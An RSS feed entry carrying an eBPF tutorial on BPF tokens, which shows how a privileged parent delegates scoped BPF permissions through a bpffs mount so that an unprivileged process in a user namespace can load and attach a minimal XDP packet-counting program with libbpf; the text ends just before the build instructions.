<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: 云微</title>
    <description>The latest articles on Forem by 云微 (@yunwei37).</description>
    <link>https://forem.com/yunwei37</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1139584%2F27142ebf-c0a3-449b-9482-d63e79238a26.jpeg</url>
      <title>Forem: 云微</title>
      <link>https://forem.com/yunwei37</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/yunwei37"/>
    <language>en</language>
    <item>
      <title>eBPF Tutorial by Example: BPF Token for Delegated Privilege and Secure Program Loading</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 17 Mar 2026 07:48:37 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-by-example-bpf-token-for-delegated-privilege-and-secure-program-loading-3b5i</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-by-example-bpf-token-for-delegated-privilege-and-secure-program-loading-3b5i</guid>
      <description>&lt;p&gt;Ever needed to let a container or CI job load an eBPF program without giving it full &lt;code&gt;CAP_BPF&lt;/code&gt; or &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt;? Or wanted to expose XDP packet processing to a tenant workload while ensuring it can only create the specific map types and program types you've approved? Before BPF token, the answer was binary: either you had the capabilities to do &lt;em&gt;everything&lt;/em&gt; in BPF, or you could do &lt;em&gt;nothing&lt;/em&gt;. There was no middle ground.&lt;/p&gt;

&lt;p&gt;This is what &lt;strong&gt;BPF Token&lt;/strong&gt; solves. Introduced by Andrii Nakryiko and merged in Linux 6.9, BPF token is a delegation mechanism that lets a privileged process (like a container runtime or systemd) create a precisely scoped permission set for BPF operations, then hand it to an unprivileged process through a bpffs mount. The unprivileged process can load programs, create maps, and attach hooks, but only the types that were explicitly allowed. No broad capabilities required.&lt;/p&gt;

&lt;p&gt;In this tutorial, we'll set up a delegated bpffs mount in a user namespace, derive a BPF token from it, and use libbpf to load and attach a minimal XDP program, all from a process that has zero BPF capabilities of its own.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_token" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_token&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to BPF Token: Solving the Privilege Problem
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: All-or-Nothing BPF Capabilities
&lt;/h3&gt;

&lt;p&gt;Traditional eBPF requires &lt;code&gt;CAP_BPF&lt;/code&gt; for program loading and map creation, plus additional capabilities like &lt;code&gt;CAP_PERFMON&lt;/code&gt; for tracing, &lt;code&gt;CAP_NET_ADMIN&lt;/code&gt; for networking hooks, and &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; for certain advanced operations. These capabilities are inherently &lt;strong&gt;system-wide&lt;/strong&gt;: you cannot namespace or sandbox &lt;code&gt;CAP_BPF&lt;/code&gt;. As the kernel documentation explains, this is by design: BPF tracing helpers like &lt;code&gt;bpf_probe_read_kernel()&lt;/code&gt; can access arbitrary kernel memory, which fundamentally cannot be scoped to a single namespace.&lt;/p&gt;

&lt;p&gt;This creates a real problem in multi-tenant environments:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Container isolation&lt;/strong&gt;: A Kubernetes pod that needs to run a simple XDP program must be given &lt;code&gt;CAP_BPF&lt;/code&gt; + &lt;code&gt;CAP_NET_ADMIN&lt;/code&gt;, which also grants it the ability to load &lt;em&gt;any&lt;/em&gt; BPF program type and create &lt;em&gt;any&lt;/em&gt; map type. There's no way to say "you can load XDP programs but not kprobes."&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;CI/CD pipelines&lt;/strong&gt;: A build job that tests an eBPF-based observability tool needs root-equivalent capabilities to load programs, even though the test only exercises a specific, well-known program type.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Third-party integrations&lt;/strong&gt;: A service mesh sidecar that attaches sockops programs needs capabilities that also grant it the ability to trace every process on the host.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The result is that organizations either give broad BPF capabilities (weakening their security posture) or prohibit BPF entirely in unprivileged contexts (limiting the technology's adoption).&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution: Scoped Delegation Through bpffs
&lt;/h3&gt;

&lt;p&gt;BPF token takes a different approach. Instead of trying to namespace capabilities (which is fundamentally unsafe for BPF), it introduces an explicit delegation model:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;A &lt;strong&gt;privileged process&lt;/strong&gt; (container runtime, init system, platform daemon) creates a bpffs instance with specific delegation options that define exactly which BPF operations are allowed.&lt;/li&gt;
&lt;li&gt;The privileged process passes this bpffs mount to an &lt;strong&gt;unprivileged process&lt;/strong&gt; (container, CI job, tenant workload).&lt;/li&gt;
&lt;li&gt;The unprivileged process derives a &lt;strong&gt;BPF token&lt;/strong&gt; from the bpffs mount. The token is a file descriptor that carries the delegated permission set.&lt;/li&gt;
&lt;li&gt;When the unprivileged process makes &lt;code&gt;bpf()&lt;/code&gt; syscalls (through libbpf or directly), it passes the token fd. The kernel checks permissions against the token instead of against the process's capabilities.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The token is scoped along four independent axes:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Delegation Option&lt;/th&gt;
&lt;th&gt;What It Controls&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;delegate_cmds&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Which &lt;code&gt;bpf()&lt;/code&gt; commands are allowed&lt;/td&gt;
&lt;td&gt;&lt;code&gt;prog_load:map_create:btf_load:link_create&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;delegate_maps&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Which map types can be created&lt;/td&gt;
&lt;td&gt;&lt;code&gt;array:hash:ringbuf&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;delegate_progs&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Which program types can be loaded&lt;/td&gt;
&lt;td&gt;&lt;code&gt;xdp:socket_filter&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;delegate_attachs&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Which attach types are allowed&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;xdp:cgroup_inet_ingress&lt;/code&gt; or &lt;code&gt;any&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Each axis is a bitmask. If a bit isn't set, the corresponding operation is denied even if the token is present. This gives platform engineers fine-grained control: you can allow a container to load XDP programs with array maps but deny it access to kprobes, perf events, or hash-of-maps.&lt;/p&gt;

&lt;h3&gt;
  
  
  The User Namespace Constraint
&lt;/h3&gt;

&lt;p&gt;One critical design decision: &lt;strong&gt;a BPF token must be created inside the same user namespace as the bpffs instance, and that user namespace must not be &lt;code&gt;init_user_ns&lt;/code&gt;&lt;/strong&gt;. This is intentional. It means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A host-namespace bpffs (the one at &lt;code&gt;/sys/fs/bpf&lt;/code&gt;) does &lt;strong&gt;not&lt;/strong&gt; produce usable tokens. Tokens only work when the bpffs is associated with a non-init user namespace.&lt;/li&gt;
&lt;li&gt;The privileged parent configures the bpffs before passing it to the child, but the child (in its own user namespace) is the one that creates and uses the token.&lt;/li&gt;
&lt;li&gt;This design prevents a process with an existing token from using it to escalate privileges outside its namespace boundary.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  How libbpf Makes It Transparent
&lt;/h3&gt;

&lt;p&gt;For applications built with libbpf (which is most of them), token usage is nearly transparent. You have three options:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Explicit path&lt;/strong&gt;: Set &lt;code&gt;bpf_object_open_opts.bpf_token_path&lt;/code&gt; when opening the BPF object. libbpf will derive the token from the specified bpffs mount.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Environment variable&lt;/strong&gt;: Set &lt;code&gt;LIBBPF_BPF_TOKEN_PATH&lt;/code&gt; to point to the bpffs mount. libbpf picks it up automatically.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Default path&lt;/strong&gt;: If the default &lt;code&gt;/sys/fs/bpf&lt;/code&gt; is a delegated bpffs in the current user namespace, libbpf uses it implicitly.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Once the token is derived, libbpf passes it to every relevant syscall (&lt;code&gt;BPF_MAP_CREATE&lt;/code&gt;, &lt;code&gt;BPF_BTF_LOAD&lt;/code&gt;, &lt;code&gt;BPF_PROG_LOAD&lt;/code&gt;, and &lt;code&gt;BPF_LINK_CREATE&lt;/code&gt;) without any source-code changes in the BPF application.&lt;/p&gt;

&lt;h2&gt;
  
  
  Writing the eBPF Program
&lt;/h2&gt;

&lt;p&gt;The BPF side of this demo is intentionally minimal: a tiny XDP program on loopback. This keeps the focus on the token workflow. Here's the complete source:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;LICENSE&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;token_stats&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;packets&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;last_ifindex&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;token_stats&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;stats_map&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"xdp"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_packet&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;xdp_md&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;token_stats&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;stats&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;stats&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;stats_map&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;stats&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;stats&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;packets&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;stats&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;last_ifindex&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ingress_ifindex&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;XDP_PASS&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A few design choices to note:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;BPF_MAP_TYPE_ARRAY&lt;/code&gt;&lt;/strong&gt; was chosen because the delegation policy explicitly allows &lt;code&gt;array&lt;/code&gt; maps. If we had used a hash map instead, loading would fail because the token doesn't grant &lt;code&gt;hash&lt;/code&gt; map creation permission. This is the token model in action; even trivial program changes can be caught by the delegation policy.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;SEC("xdp")&lt;/code&gt;&lt;/strong&gt; matches the &lt;code&gt;delegate_progs=xdp&lt;/code&gt; policy. If you changed this to &lt;code&gt;SEC("kprobe/...")&lt;/code&gt;, the kernel would reject it at load time with an &lt;code&gt;EPERM&lt;/code&gt; because kprobe isn't in the allowed program types.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;XDP_PASS&lt;/code&gt;&lt;/strong&gt; simply lets every packet through. The program's only purpose is to prove that a token-backed load and attach succeeded. In production, you'd replace this with real packet-processing logic.&lt;/p&gt;

&lt;h2&gt;
  
  
  User-Space Loader: Token-Backed Loading
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;token_trace.c&lt;/code&gt; loader is a standard libbpf skeleton program with one key addition: it passes a &lt;code&gt;bpf_token_path&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_object_open_opts&lt;/span&gt; &lt;span class="n"&gt;open_opts&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{};&lt;/span&gt;

&lt;span class="n"&gt;open_opts&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sz&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;open_opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="n"&gt;open_opts&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;bpf_token_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;token_path&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;token_trace_bpf__open_opts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;open_opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;From this point on, libbpf takes over. When it calls &lt;code&gt;bpf(BPF_MAP_CREATE)&lt;/code&gt; to create &lt;code&gt;stats_map&lt;/code&gt;, it includes the token fd. When it calls &lt;code&gt;bpf(BPF_PROG_LOAD)&lt;/code&gt; for the XDP program, it includes the token fd. When it calls &lt;code&gt;bpf(BPF_LINK_CREATE)&lt;/code&gt; to attach to the interface, it includes the token fd.&lt;/p&gt;

&lt;p&gt;The rest of the loader is straightforward:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;token_trace_bpf__load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;    &lt;span class="c1"&gt;// token used for map_create + prog_load&lt;/span&gt;
&lt;span class="n"&gt;link&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__attach_xdp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;handle_packet&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ifindex&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;  &lt;span class="c1"&gt;// token used for link_create&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After attaching, the loader reads the map before and after generating a test packet to verify the program executed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;map_fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;before&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="c1"&gt;// ... generate UDP packet to 127.0.0.1 ...&lt;/span&gt;
&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;map_fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;after&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"delta          : %llu&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;after&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;packets&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;before&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;packets&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the delta is 1, the XDP program was successfully loaded and attached using only delegated capabilities.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Namespace Orchestrator: &lt;code&gt;token_userns_demo&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;Because BPF token requires a non-init user namespace, running a bare &lt;code&gt;token_trace -t /sys/fs/bpf&lt;/code&gt; on the host won't work. The &lt;code&gt;token_userns_demo.c&lt;/code&gt; wrapper automates the complex namespace choreography. Here's the full sequence:&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Fork and Create Namespaces
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;parent (root, init_user_ns)          child (unprivileged, new userns)
         │                                        │
         │   fork()                               │
         ├────────────────────────────────────────&amp;gt;│
         │                                        │
         │                            unshare(CLONE_NEWUSER)
         │                            unshare(CLONE_NEWNS | CLONE_NEWNET)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The child creates a new user namespace (where it maps itself to uid/gid 0), a new mount namespace (so bpffs mounts are private), and a new network namespace (so &lt;code&gt;lo&lt;/code&gt; is a fresh interface it can attach to).&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Create bpffs and Configure Delegation
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;parent (root, init_user_ns)          child (new userns)
         │                                        │
         │                            fs_fd = fsopen("bpf", 0)
         │   &amp;lt;───── send fs_fd via SCM_RIGHTS ────│
         │                                        │
    fsconfig(fs_fd, "delegate_cmds", ...)         │  (waiting for ack)
    fsconfig(fs_fd, "delegate_maps", "array")     │
    fsconfig(fs_fd, "delegate_progs", "xdp:...")  │
    fsconfig(fs_fd, "delegate_attachs", "any")    │
    fsconfig(fs_fd, FSCONFIG_CMD_CREATE)          │
         │                                        │
         │   ───────── send ack ─────────────────&amp;gt;│
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The child calls &lt;code&gt;fsopen("bpf", 0)&lt;/code&gt; to create a bpffs filesystem context in its user namespace, then sends the file descriptor to the parent via a Unix socket (&lt;code&gt;SCM_RIGHTS&lt;/code&gt;). The parent, running as root in the init namespace, configures the delegation policy with &lt;code&gt;fsconfig()&lt;/code&gt;, then materializes the filesystem with &lt;code&gt;FSCONFIG_CMD_CREATE&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;This two-step dance is necessary because: (a) the bpffs must be created in the child's user namespace (for the token to be valid there), but (b) only the privileged parent can set delegation options (because those options grant BPF capabilities).&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 3: Mount and Load
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;child &lt;span class="o"&gt;(&lt;/span&gt;new userns&lt;span class="o"&gt;)&lt;/span&gt;
         │
    mnt_fd &lt;span class="o"&gt;=&lt;/span&gt; fsmount&lt;span class="o"&gt;(&lt;/span&gt;fs_fd, 0, 0&lt;span class="o"&gt;)&lt;/span&gt;
    token_path &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/proc/self/fd/&amp;lt;mnt_fd&amp;gt;"&lt;/span&gt;
    set_loopback_up&lt;span class="o"&gt;()&lt;/span&gt;
    &lt;span class="nb"&gt;exec&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"./token_trace"&lt;/span&gt;, &lt;span class="s2"&gt;"-t"&lt;/span&gt;, token_path, &lt;span class="s2"&gt;"-i"&lt;/span&gt;, &lt;span class="s2"&gt;"lo"&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The child materializes the bpffs as a detached mount (no mount point needed, since &lt;code&gt;/proc/self/fd/&amp;lt;mnt_fd&amp;gt;&lt;/code&gt; gives a path), brings the loopback interface up in its network namespace, and &lt;code&gt;exec&lt;/code&gt;s &lt;code&gt;token_trace&lt;/code&gt; with the bpffs path. From &lt;code&gt;token_trace&lt;/code&gt;'s perspective, it's just opening a BPF object with a token path. It doesn't know or care about the namespace setup.&lt;/p&gt;

&lt;h2&gt;
  
  
  Preparing a bpffs Mount Manually
&lt;/h2&gt;

&lt;p&gt;If you want to experiment with the mount syntax outside the demo wrapper, the repository includes a helper script:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;bpf-developer-tutorial/src/features/bpf_token
bash setup_token_bpffs.sh /tmp/bpf-token
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This mounts bpffs at &lt;code&gt;/tmp/bpf-token&lt;/code&gt; with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;delegate_cmds=prog_load:map_create:btf_load:link_create
delegate_maps=array
delegate_progs=xdp:socket_filter
delegate_attachs=any
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why &lt;code&gt;socket_filter&lt;/code&gt;?&lt;/strong&gt; libbpf performs a trivial program-load probe before loading the real BPF object. This probe uses a generic &lt;code&gt;BPF_PROG_TYPE_SOCKET_FILTER&lt;/code&gt; program to detect kernel feature support. Without &lt;code&gt;socket_filter&lt;/code&gt; in the delegation policy, the probe fails and libbpf refuses to proceed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why &lt;code&gt;delegate_attachs=any&lt;/code&gt;?&lt;/strong&gt; The same libbpf probe path also triggers attach-type validation in the kernel's token checking code. Using &lt;code&gt;any&lt;/code&gt; avoids having to enumerate every possible attach type for probe compatibility.&lt;/p&gt;

&lt;p&gt;Note that a host-namespace mount like this is useful for inspecting the delegation policy (e.g., with &lt;code&gt;bpftool token list&lt;/code&gt;), but won't produce working tokens unless the &lt;code&gt;bpf(BPF_TOKEN_CREATE)&lt;/code&gt; syscall comes from a matching non-init user namespace.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Build all binaries:&lt;br&gt;
&lt;/p&gt;

